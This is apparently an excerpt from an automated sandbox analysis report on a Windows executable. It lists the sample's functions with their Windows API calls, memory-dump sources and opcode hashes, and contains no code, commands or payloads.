                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __setmode$DebugOutputString_fprintf
                                                                                                        • String ID:
                                                                                                        • API String ID: 1792727568-0
                                                                                                        • Opcode ID: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                        • Instruction ID: 94d91137fd77379d51e6296772f15362c7f2cf1f8b16651245aa9cc134f84072
                                                                                                        • Opcode Fuzzy Hash: 1ad8d8d19ebad69fc12c553a92627abd23c9aa4f6f7f42f57f8396caf8494ece
                                                                                                        • Instruction Fuzzy Hash: 5411A1B2D0020477DB107BB69C469AF7B2C8B55728F04416EF91573243E97C6A4947AB
                                                                                                        Function 0047A26A Relevance: 6.1, APIs: 4, Instructions: 78COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0046F3C1: IsWindow.USER32(00000000), ref: 0046F3F1
                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 0047A2DF
                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A2FA
                                                                                                        • SetWindowLongW.USER32(?,000000EC,00000000), ref: 0047A312
                                                                                                        • SetLayeredWindowAttributes.USER32(?,00000000,?,00000002,?,000000EC,00000000,?,000000EC,?,00000001), ref: 0047A321
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$Long$AttributesLayered
                                                                                                        • String ID:
                                                                                                        • API String ID: 2169480361-0
                                                                                                        • Opcode ID: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                        • Instruction ID: 4b457c036b32d13d4d6aa44b7b333d7b15c6210fa1ac615a770d46c951a2b689
                                                                                                        • Opcode Fuzzy Hash: 53dc7990cfeb01f65bcc542d15cac6368a2c86d5c8ae23ecc65d9f578e391a7a
                                                                                                        • Instruction Fuzzy Hash: E321C3322045146BD310AB19EC45F9BB798EF81334F20862BF859E72D1C779A855C7AC
                                                                                                        Function 00434CC9 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 75stringCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 00434C09: lstrlenW.KERNEL32(?), ref: 00434C1C
                                                                                                          • Part of subcall function 00434C09: lstrcpyW.KERNEL32(00000000,?), ref: 00434C44
                                                                                                          • Part of subcall function 00434C09: lstrcmpiW.KERNEL32(00000000,00000000), ref: 00434C78
                                                                                                        • lstrlenW.KERNEL32(?), ref: 00434CF6
                                                                                                          • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                                                                        • lstrcpyW.KERNEL32(00000000,?), ref: 00434D1E
                                                                                                        • lstrcmpiW.KERNEL32(00000002,cdecl), ref: 00434D64
                                                                                                        Strings
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: lstrcmpilstrcpylstrlen$_malloc
                                                                                                        • String ID: cdecl
                                                                                                        • API String ID: 3850814276-3896280584
                                                                                                        • Opcode ID: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                        • Instruction ID: b4b7f9d7485e9dcc41445171e378d0673d7e4b3d8a31a27b28546bfa00bfc119
                                                                                                        • Opcode Fuzzy Hash: 21c69cf6c29ea855f725dfe2a9cb2720d4b8dbea94fc3a7d57af4f6d050de3c2
                                                                                                        • Instruction Fuzzy Hash: 1521D276200301ABD710AF25DC45AEBB3A9FF99354F10583FF90687250EB39E945C7A9
                                                                                                        Function 0046D402 Relevance: 6.1, APIs: 4, Instructions: 73networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                          • Part of subcall function 0045F645: WideCharToMultiByte.KERNEL32(00000000,00000000,5004C483,D29EE858,00000000,00000000,00000000,00000000,?,?,?,00467B75,?,00473BB8,00473BB8,?), ref: 0045F661
                                                                                                        • gethostbyname.WSOCK32(?,00000000,?,?), ref: 0046D42D
                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 0046D439
                                                                                                        • _memmove.LIBCMT ref: 0046D475
                                                                                                        • inet_ntoa.WSOCK32(?), ref: 0046D481
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ByteCharErrorLastMultiWide_memmovegethostbynameinet_ntoa
                                                                                                        • String ID:
                                                                                                        • API String ID: 2502553879-0
                                                                                                        • Opcode ID: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                        • Instruction ID: 24c3f219ec43f49587972b4c28f02db1d16d05b11a5808876a7c02c26e676da9
                                                                                                        • Opcode Fuzzy Hash: c217391507a75a633327f3eae623a7fb2dd57c89b178c2547ebfa016f7fa05d4
                                                                                                        • Instruction Fuzzy Hash: A7216F769001046BC700FBA6DD85C9FB7BCEF48318B10486BFC01B7241DA39EE058BA5
                                                                                                        Function 00448C3C Relevance: 6.1, APIs: 4, Instructions: 72windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32 ref: 00448C69
                                                                                                        • GetWindowLongW.USER32(?,000000EC), ref: 00448C91
                                                                                                        • SendMessageW.USER32(?,0000104C,00000000,?), ref: 00448CCA
                                                                                                        • SendMessageW.USER32(?,0000102B,00000000,?), ref: 00448D13
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend$LongWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 312131281-0
                                                                                                        • Opcode ID: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                        • Instruction ID: 9d65767971b32091eca868ce8e4b461936feaca2c152e776436a997c982fc1ac
                                                                                                        • Opcode Fuzzy Hash: aa9ba785652a5e2d68973233cc9ee5be9ec2ae113b50a66827928a68bf1dc890
                                                                                                        • Instruction Fuzzy Hash: 782186711193009BE3209F18DD88B9FB7E4FBD5325F140B1EF994962D0DBB58448C755
                                                                                                        Function 00458A61 Relevance: 6.1, APIs: 4, Instructions: 71networkCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • select.WSOCK32(00000000,?,00000000,00000000,?), ref: 00458ABD
                                                                                                        • __WSAFDIsSet.WSOCK32(00000000,00000001), ref: 00458ACF
                                                                                                        • accept.WSOCK32(00000000,00000000,00000000), ref: 00458ADE
                                                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 00458B03
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ErrorLastacceptselect
                                                                                                        • String ID:
                                                                                                        • API String ID: 385091864-0
                                                                                                        • Opcode ID: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                        • Instruction ID: 6dce411450cb473f00463c700f03c36a20fe0f69cdcaeecb298670ce0bdbd9a3
                                                                                                        • Opcode Fuzzy Hash: feb2d603c895e760471213290e220df4c8c9e23c071c6cdae6f1f3a6ceb811dc
                                                                                                        • Instruction Fuzzy Hash: 032192716002049FD714EF69DD45BAAB7E8EB94310F10866EF988DB380DBB4A9808B94
                                                                                                        Function 004368A0 Relevance: 6.1, APIs: 4, Instructions: 69windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 004368C2
                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368D5
                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 004368EC
                                                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 00436904
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: MessageSend
                                                                                                        • String ID:
                                                                                                        • API String ID: 3850602802-0
                                                                                                        • Opcode ID: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                        • Instruction ID: 15055718653181d31d708d6839b45d2b231db9ad4f5f2f8f789da6f3b04ac486
                                                                                                        • Opcode Fuzzy Hash: 236e71af2ab5509716104e28957e7b962cfbcf4ba6a1ba9531cfd5eb7baefe48
                                                                                                        • Instruction Fuzzy Hash: A7111275640208BFDB10DF68DC85F9AB7E8EF98750F11815AFD48DB340D6B1A9418FA0
                                                                                                        Function 004301F8 Relevance: 6.1, APIs: 4, Instructions: 57windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00400000,00000000), ref: 00430242
                                                                                                        • GetStockObject.GDI32(00000011), ref: 00430258
                                                                                                        • SendMessageW.USER32(00000000,00000030,00000000), ref: 00430262
                                                                                                        • ShowWindow.USER32(00000000,00000000), ref: 0043027D
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: Window$CreateMessageObjectSendShowStock
                                                                                                        • String ID:
                                                                                                        • API String ID: 1358664141-0
                                                                                                        • Opcode ID: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                        • Instruction ID: 87b955557270564ac2446a75def7de819d41fbc8528d619d8765837e6f615a12
                                                                                                        • Opcode Fuzzy Hash: ad6f98361a8c00dabf9f53bae98ff29a7c8ddeda354316ac2ad0817ad8c48d31
                                                                                                        • Instruction Fuzzy Hash: BD115172600504ABD755CF99DC59FDBB769AF8DB10F148319BA08932A0D774EC41CBA8
                                                                                                        Function 00443C87 Relevance: 6.1, APIs: 4, Instructions: 57synchronizationthreadwindowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetCurrentThreadId.KERNEL32 ref: 00443CA6
                                                                                                        • MessageBoxW.USER32(?,?,?,?), ref: 00443CDC
                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF), ref: 00443CF2
                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00443CF9
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                                                        • String ID:
                                                                                                        • API String ID: 2880819207-0
                                                                                                        • Opcode ID: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                        • Instruction ID: e6f874550e00e623fb34483f391c95d80eb5f5bc6ce026338450b862d26ff76c
                                                                                                        • Opcode Fuzzy Hash: 229c650092e78496607f1920186e21dd31435e443465a7f1ce6d350790d3a3c2
                                                                                                        • Instruction Fuzzy Hash: 48112572804114ABD710CF68ED08ADF3FACDF99721F10026AFC0493381D6B09A1083E9
                                                                                                        Function 00430B87 Relevance: 6.1, APIs: 4, Instructions: 53COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetWindowRect.USER32(?,?), ref: 00430BA2
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00430BC1
                                                                                                        • ScreenToClient.USER32(?,?), ref: 00430BE2
                                                                                                        • InvalidateRect.USER32(?,?,?,?,?), ref: 00430BFB
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                                                        • String ID:
                                                                                                        • API String ID: 357397906-0
                                                                                                        • Opcode ID: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                        • Instruction ID: ace0395ef2957b48f9d17fb026497d1a369c9e3160b5fb36bd9a4683c33ce433
                                                                                                        • Opcode Fuzzy Hash: ae0d0d06dcef6ed583fb9704f0ef5e529f18a40629d10526419e4a4e3dd97404
                                                                                                        • Instruction Fuzzy Hash: 561174B9D00209AFCB14DF98C8849AEFBB9FF98310F10855EE855A3304D774AA41CFA0
                                                                                                        Function 00433908 Relevance: 6.0, APIs: 4, Instructions: 50COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • __wsplitpath.LIBCMT ref: 0043392E
                                                                                                          • Part of subcall function 00413A0E: __wsplitpath_helper.LIBCMT ref: 00413A50
                                                                                                        • __wsplitpath.LIBCMT ref: 00433950
                                                                                                        • __wcsicoll.LIBCMT ref: 00433974
                                                                                                        • __wcsicoll.LIBCMT ref: 0043398A
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: __wcsicoll__wsplitpath$__wsplitpath_helper
                                                                                                        • String ID:
                                                                                                        • API String ID: 1187119602-0
                                                                                                        • Opcode ID: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                        • Instruction ID: cee1712abd0eced5cc96ea34974ed2185298bb9760f8079e64959bf12be8e646
                                                                                                        • Opcode Fuzzy Hash: 68e3b32a9464b28f7030a0941ccdc911afb24839bc46986435f1213a6174ca5b
                                                                                                        • Instruction Fuzzy Hash: 650121B2C0011DAACB14DF95DC41DEEB37CAB48314F04869EA60956040EA759BD88FE4
                                                                                                        Function 00434963 Relevance: 6.0, APIs: 4, Instructions: 46COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: _wcslen$_malloc_wcscat_wcscpy
                                                                                                        • String ID:
                                                                                                        • API String ID: 1597257046-0
                                                                                                        • Opcode ID: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                        • Instruction ID: 3a313011a65081929a098f39c1c59cfda42f2cbb237f2651e2b7e76e77134880
                                                                                                        • Opcode Fuzzy Hash: 3c6fc8acff7e2f2e7aee9de07fb73a2c390eddda5e8305f0b40f95221864db4e
                                                                                                        • Instruction Fuzzy Hash: 40016271200604BFC714EB66D885EABF3EDEFC9354B00852EFA168B651DB39E841C764
                                                                                                        Function 0041F584 Relevance: 6.0, APIs: 4, Instructions: 41COMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        • GetEnvironmentStringsW.KERNEL32(00000000,00416513), ref: 0041F587
                                                                                                        • __malloc_crt.LIBCMT ref: 0041F5B6
                                                                                                        • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 0041F5C3
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
                                                                                                        • Snapshot File: hcaresult_0_2_400000_Z6s208B9QX.jbxd
                                                                                                        Similarity
                                                                                                        • API ID: EnvironmentStrings$Free__malloc_crt
                                                                                                        • String ID:
                                                                                                        • API String ID: 237123855-0
                                                                                                        • Opcode ID: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                        • Instruction ID: d6a98a4ee5591e13f27bf8bfb2f7094eea62761642478a01f8f101a8eeefaa10
                                                                                                        • Opcode Fuzzy Hash: 07fe547740a9b68c76983245d8bba65816afc234b1fe2171e551a8e4c438482c
                                                                                                        • Instruction Fuzzy Hash: D1F08277505220BB8A25BF35BC458DB277ADAD536531A443BF407C3206F66C8ECB82B9
                                                                                                        Function 004556BE Relevance: 6.0, APIs: 4, Instructions: 40windowCOMMON
                                                                                                        Download Yara Rule
                                                                                                        APIs
                                                                                                        Memory Dump Source
                                                                                                        • Source File: 00000000.00000002.1290895612.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                        • Associated: 00000000.00000002.1290866575.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1290982087.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291011094.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291041504.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291072631.00000000004A8000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                        • Associated: 00000000.00000002.1291141059.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                        Joe Sandbox IDA Plugin
